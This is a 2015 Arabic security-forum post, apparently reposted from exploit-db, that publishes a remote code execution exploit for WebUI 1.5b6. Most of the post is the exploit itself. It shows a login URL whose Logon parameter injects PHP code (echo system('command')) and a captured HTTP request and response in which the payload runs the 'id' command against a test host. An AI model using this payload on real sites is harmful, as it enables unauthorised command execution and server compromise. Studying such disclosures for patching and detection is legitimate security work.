TO DONATE : BTC => 1BU6R1C4AQ77LjLZswQNKFwAupw61i88Kn || PM => U4089661


اهم قوانين :1- منع الردود الباهتة مثل شكرااااا و أخواتها 2- لا يسمح بالمشاحنات الطائفية باآ شكل من الأشكال 3- عدم استعمال الألفاظ التافهة و الكلام البذىء 4- عدم وضع معرفات التواصل الأجتماعى بالردود 5- الأطلاع على كامل القوانين واجب 


العودة   الحماية للأبد -Security 4 Ever > قسم الحماية - Security section > قسم جديد الثغرات > قسم جديد ثغرات الأعضاء

قسم جديد ثغرات الأعضاء يختص بجديد ثغرات الأعضاء

 
أدوات الموضوع انواع عرض الموضوع
  #1  
قديم 12-06-2015, 04:51 PM
الصورة الرمزية miutex
miutex
عضو مميز
 
حـالة التــواجـد : miutex غير متواجد حالياً
تاريخ التسجيل: Jun 2013
الجــــنــــــس: ذكـر
المشاركات: 102
شكراً:87
تم شكره 271 مرة في 63 مشاركة
معدل تقييم المستوى: 0
miutex بدون تقييم
افتراضي WebUI 1.5b6 - Remote Code Execution Vulnerability

كود PHP:
#[+] Author: TUNISIAN CYBER
#[+] Title:  WebUI Remote Code Execution Vulnerability
#[+] Date: 21-04-2015
#[+] Vendor: https://github.com/baram01/webui/
#[+] Type: WebAPP
#[+] Tested on: KaliLinux (Debian)
#[+] Twitter: @TCYB3R
#[+] Proof of concept: http://i.imgur.com/co9Qx0n.png
-------------------------------------------------------------------------------
p0c:
 
http://site/webui/mainfile.php?username=USER&password=PASSWORD&_login=1&Logon=';echo system('command');'
 
Live HTTP Header:
http://192.168.186.129/webui/mainfile.php?username=RCE&password=RCE&_login=1&Logon=%27;echo%20system(%27id%27);%27
 
GET /webui/mainfile.php?username=RCE&password=RCE&_login=1&Logon=%27;echo%20system(%27id%27);%27 HTTP/1.1
Host
192.168.186.129
User
-AgentMozilla/5.0 (X11Linux x86_64rv:31.0Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0
Accept
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
 
HTTP/1.1 200 OK
Date: Wed, 22 Apr 2015 13:20:23 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.39-0+deb7u2
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 51
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html 

https://www.exploit-db.com/exploits/36821/  

 

 

" يَرْفَعِ اللَّهُ الَّذِينَ آمَنُوا مِنكُمْ وَالَّذِينَ أُوتُوا الْعِلْمَ دَرَجَاتٍ وَاللَّهُ بِمَا تَعْمَلُونَ خَبِيرٌ"
سورة المجادلة
رد مع اقتباس
6 أعضاء قالوا شكراً لـ miutex على المشاركة المفيدة:

الكلمات الدلالية (Tags)
code, execution, remote, vulnerability, webui


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
#1337day ManageEngine Desktop Central MSP Remote Code Execution Vulnerability [remote inj3ct0r قسم جديد ثغرات مواقع الحماية 0 09-01-2015 12:22 PM
#1337day BitTorrent Web Interface Remote Code Execution Vulnerability [remote #exploi inj3ct0r قسم جديد ثغرات مواقع الحماية 0 09-01-2015 12:22 PM
[remote exploits] - SerComm Device Remote Code Execution Vulnerability inj3ct0r قسم جديد ثغرات مواقع الحماية 0 10-01-2014 08:47 PM
[remote exploits] - HP SiteScope issueSiebelCmd Remote Code Execution Vulnerability inj3ct0r قسم جديد ثغرات مواقع الحماية 0 09-01-2014 09:37 AM
[remote exploits] - MongoDB nativeHelper.apply Remote Code Execution Vulnerability inj3ct0r قسم جديد ثغرات مواقع الحماية 0 02-04-2013 09:21 PM


الساعة الآن 06:26 PM